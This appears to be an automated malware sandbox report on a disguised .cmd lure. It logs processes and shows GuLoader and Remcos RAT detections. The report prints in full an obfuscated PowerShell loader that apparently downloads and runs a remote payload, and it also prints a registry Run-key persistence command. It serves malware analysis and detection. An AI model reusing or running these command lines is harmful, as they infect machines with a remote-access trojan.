                                                                              Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                              2024-05-02 15:21:59 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                              Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:17:20:53
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" "
                                                                              Imagebase:0x7ff61a8e0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:17:20:56
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
                                                                              Imagebase:0x7ff61a8e0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:17:21:03
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
                                                                              Imagebase:0xf00000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:17:21:05
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:7
                                                                              Start time:17:21:06
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:17:21:07
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:17:21:12
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:11
                                                                              Start time:17:21:13
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:17:21:14
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:17:21:40
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                              Imagebase:0xd40000
                                                                              File size:516'608 bytes
                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:16
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:17:21:50
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
                                                                              Imagebase:0xa90000
                                                                              File size:59'392 bytes
                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 00007FFD9BA0CED6 Relevance: .5, Instructions: 470COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
